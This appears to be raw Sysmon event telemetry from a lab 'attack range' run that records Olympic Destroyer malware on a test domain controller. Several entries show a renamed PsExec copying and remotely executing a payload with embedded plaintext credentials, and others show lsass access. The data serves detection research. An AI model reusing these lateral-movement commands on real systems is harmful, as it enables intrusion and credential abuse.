10:57:09.651{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-1305-6216-1006-000000003802}1640C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292497Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.635{C8EA50B7-1305-6216-1306-000000003802}33565552C:\Windows\system32\conhost.exe{C8EA50B7-1305-6216-1106-000000003802}1956C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292496Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:09.635{C8EA50B7-1305-6216-1006-000000003802}1640C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292495Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.598{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1305-6216-1306-000000003802}3356C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292494Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.598{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1305-6216-1206-000000003802}5208C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292493Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.598{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1305-6216-1206-000000003802}5208C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292492Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.598{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1305-6216-1306-000000003802}3356C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292491Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.582{C8EA50B7-1305-6216-1206-000000003802}52085224C:\Windows\system32\conhost.exe{C8EA50B7-1305-6216-1006-000000003802}1640C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292490Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.553{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1305-6216-1206-000000003802}5208C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292489Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.553{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1305-6216-1206-000000003802}5208C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292488Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.451{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1305-6216-1106-000000003802}1956C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292487Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.451{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292486Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.451{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292485Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.451{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292484Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.451{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292483Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.451{C8EA50B7-12E6-6216-4B05-000000003802}67926936C:\Temp\olympic_destroyer.exe{C8EA50B7-1305-6216-1106-000000003802}1956C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292482Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.453{C8EA50B7-1305-6216-1106-000000003802}1956C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.252 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292481Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.451{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1305-6216-1106-000000003802}1956C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292480Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.398{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1305-6216-1006-000000003802}1640C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292479Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.398{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292478Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.398{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292477Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.398{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292476Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.398{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292475Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.398{C8EA50B7-12E6-6216-4B05-000000003802}67926924C:\Temp\olympic_destroyer.exe{C8EA50B7-1305-6216-1006-000000003802}1640C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292474Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.400{C8EA50B7-1305-6216-1006-000000003802}1640C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\239.255.255.250 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292473Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.398{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1305-6216-1006-000000003802}1640C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000292472Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:07.270{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local51782- 23542300x8000000000000000217768Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:10.290{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C16398D5E6612A141417A830AEDFA502,SHA256=550B34CC4320CD46A0D99DA156BCECF146C13AEED9FF7674879B15F969930BFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292543Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:10.183{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AB4E93A8A3D8B2ABF21CEA9C0D1CA9B,SHA256=A002AEEAFEC07B74A5F2648B973FE3FD4F74B4335A7D2B9636BA3F588787DC8C,IMPHASH=00000000000000000000000000000000falsetrue 534500x8000000000000000292542Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.998{C8EA50B7-1305-6216-1506-000000003802}6156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292541Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.998{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-1305-6216-1506-000000003802}6156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292540Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:09.998{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-1305-6216-1506-000000003802}6156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292539Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:09.983{C8EA50B7-1305-6216-1506-000000003802}6156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 22542200x8000000000000000292538Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:07.284{C8EA50B7-F11F-6215-1300-000000003802}616ip-10-0-1-1.eu-central-1.compute.internal010.0.1.1;C:\Windows\System32\svchost.exe 10341000x8000000000000000292537Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 